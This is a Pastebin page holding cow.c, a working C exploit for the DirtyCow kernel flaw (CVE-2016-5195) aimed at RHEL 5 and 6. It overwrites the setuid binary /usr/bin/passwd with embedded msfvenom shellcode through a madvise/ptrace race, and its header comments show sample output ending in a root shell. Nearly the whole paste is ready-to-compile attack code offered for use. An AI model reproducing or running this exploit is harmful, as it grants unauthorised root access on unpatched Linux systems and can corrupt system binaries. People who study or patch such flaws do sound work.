API tools faq
paste
Guest User

cow.c

a guest
Oct 27th, 2016
57
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 4.39 KB | None | 0 0
raw download clone embed print report
  1. /*
  2. * A PTRACE_POKEDATA variant of CVE-2016-5195
  3. * should work on RHEL 5 & 6
  4. *
  5. * (un)comment correct payload (x86 or x64)!
  6. * $ gcc -pthread c0w.c -o c0w
  7. * $ ./c0w
  8. * DirtyCow root privilege escalation
  9. * Backing up /usr/bin/passwd.. to /tmp/bak
  10. * mmap fa65a000
  11. * madvise 0
  12. * ptrace 0
  13. * $ /usr/bin/passwd
  14. * [root@server foo]# whoami
  15. * root
  16. * [root@server foo]# id
  17. * uid=0(root) gid=501(foo) groups=501(foo)
  18. * @KrE80r
  19. */
  20. #include <fcntl.h>
  21. #include <pthread.h>
  22. #include <string.h>
  23. #include <stdio.h>
  24. #include <stdint.h>
  25. #include <sys/mman.h>
  26. #include <sys/stat.h>
  27. #include <sys/types.h>
  28. #include <sys/wait.h>
  29. #include <sys/ptrace.h>
  30. #include <unistd.h>
  31.  
  32. int f;
  33. void *map;
  34. pid_t pid;
  35. pthread_t pth;
  36. struct stat st;
  37.  
  38. // change if no permissions to read
  39. char suid_binary[] = "/usr/bin/passwd";
  40.  
  41. /*
  42. * $ msfvenom -p linux/x64/exec CMD=/bin/bash PrependSetuid=True -f elf | xxd -i
  43. */
  44. unsigned char shell_code[] = {
  45. 0x7f, 0x45, 0x4c, 0x46, 0x02, 0x01, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00,
  46. 0x00, 0x00, 0x00, 0x00, 0x02, 0x00, 0x3e, 0x00, 0x01, 0x00, 0x00, 0x00,
  47. 0x78, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00,
  48. 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
  49. 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x38, 0x00, 0x01, 0x00, 0x00, 0x00,
  50. 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x07, 0x00, 0x00, 0x00,
  51. 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00,
  52. 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00,
  53. 0xb1, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xea, 0x00, 0x00, 0x00,
  54. 0x00, 0x00, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
  55. 0x48, 0x31, 0xff, 0x6a, 0x69, 0x58, 0x0f, 0x05, 0x6a, 0x3b, 0x58, 0x99,
  56. 0x48, 0xbb, 0x2f, 0x62, 0x69, 0x6e, 0x2f, 0x73, 0x68, 0x00, 0x53, 0x48,
  57. 0x89, 0xe7, 0x68, 0x2d, 0x63, 0x00, 0x00, 0x48, 0x89, 0xe6, 0x52, 0xe8,
  58. 0x0a, 0x00, 0x00, 0x00, 0x2f, 0x62, 0x69, 0x6e, 0x2f, 0x62, 0x61, 0x73,
  59. 0x68, 0x00, 0x56, 0x57, 0x48, 0x89, 0xe6, 0x0f, 0x05
  60. };
  61. unsigned int sc_len = 177;
  62.  
  63. /*
  64. * $ msfvenom -p linux/x86/exec CMD=/bin/bash PrependSetuid=True -f elf | xxd -i
  65. unsigned char shell_code[] = {
  66. 0x7f, 0x45, 0x4c, 0x46, 0x01, 0x01, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00,
  67. 0x00, 0x00, 0x00, 0x00, 0x02, 0x00, 0x03, 0x00, 0x01, 0x00, 0x00, 0x00,
  68. 0x54, 0x80, 0x04, 0x08, 0x34, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
  69. 0x00, 0x00, 0x00, 0x00, 0x34, 0x00, 0x20, 0x00, 0x01, 0x00, 0x00, 0x00,
  70. 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
  71. 0x00, 0x80, 0x04, 0x08, 0x00, 0x80, 0x04, 0x08, 0x88, 0x00, 0x00, 0x00,
  72. 0xbc, 0x00, 0x00, 0x00, 0x07, 0x00, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00,
  73. 0x31, 0xdb, 0x6a, 0x17, 0x58, 0xcd, 0x80, 0x6a, 0x0b, 0x58, 0x99, 0x52,
  74. 0x66, 0x68, 0x2d, 0x63, 0x89, 0xe7, 0x68, 0x2f, 0x73, 0x68, 0x00, 0x68,
  75. 0x2f, 0x62, 0x69, 0x6e, 0x89, 0xe3, 0x52, 0xe8, 0x0a, 0x00, 0x00, 0x00,
  76. 0x2f, 0x62, 0x69, 0x6e, 0x2f, 0x62, 0x61, 0x73, 0x68, 0x00, 0x57, 0x53,
  77. 0x89, 0xe1, 0xcd, 0x80
  78. };
  79. unsigned int sc_len = 136;
  80. */
  81.  
  82. void *madviseThread(void *arg) {
  83. int i,c=0;
  84. for(i=0;i<200000000;i++)
  85. c+=madvise(map,100,MADV_DONTNEED);
  86. printf("madvise %d\n\n",c);
  87. }
  88.  
  89.  
  90. int main(int argc,char *argv[]){
  91.  
  92. printf(" \n\
  93. (___) \n\
  94. (o o)_____/ \n\
  95. @@ ` \\ \n\
  96. \\ ____, /%s \n\
  97. // // \n\
  98. ^^ ^^ \n\
  99. ", suid_binary);
  100. char *backup;
  101. printf("DirtyCow root privilege escalation\n");
  102. printf("Backing up %s to /tmp/bak\n", suid_binary);
  103. asprintf(&backup, "cp %s /tmp/bak", suid_binary);
  104. system(backup);
  105.  
  106. f=open(suid_binary,O_RDONLY);
  107. fstat(f,&st);
  108. map=mmap(NULL,st.st_size+sizeof(long),PROT_READ,MAP_PRIVATE,f,0);
  109. printf("mmap %x\n\n",map);
  110. pid=fork();
  111. if(pid){
  112. waitpid(pid,NULL,0);
  113. int u,i,o,c=0,l=sc_len;
  114. for(i=0;i<10000/l;i++)
  115. for(o=0;o<l;o++)
  116. for(u=0;u<10000;u++)
  117. c+=ptrace(PTRACE_POKETEXT,pid,map+o,*((long*)(shell_code+o)));
  118. printf("ptrace %d\n\n",c);
  119. }
  120. else{
  121. pthread_create(&pth,
  122. NULL,
  123. madviseThread,
  124. NULL);
  125. ptrace(PTRACE_TRACEME);
  126. kill(getpid(),SIGSTOP);
  127. pthread_join(pth,NULL);
  128. }
  129. return 0;
  130. }
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!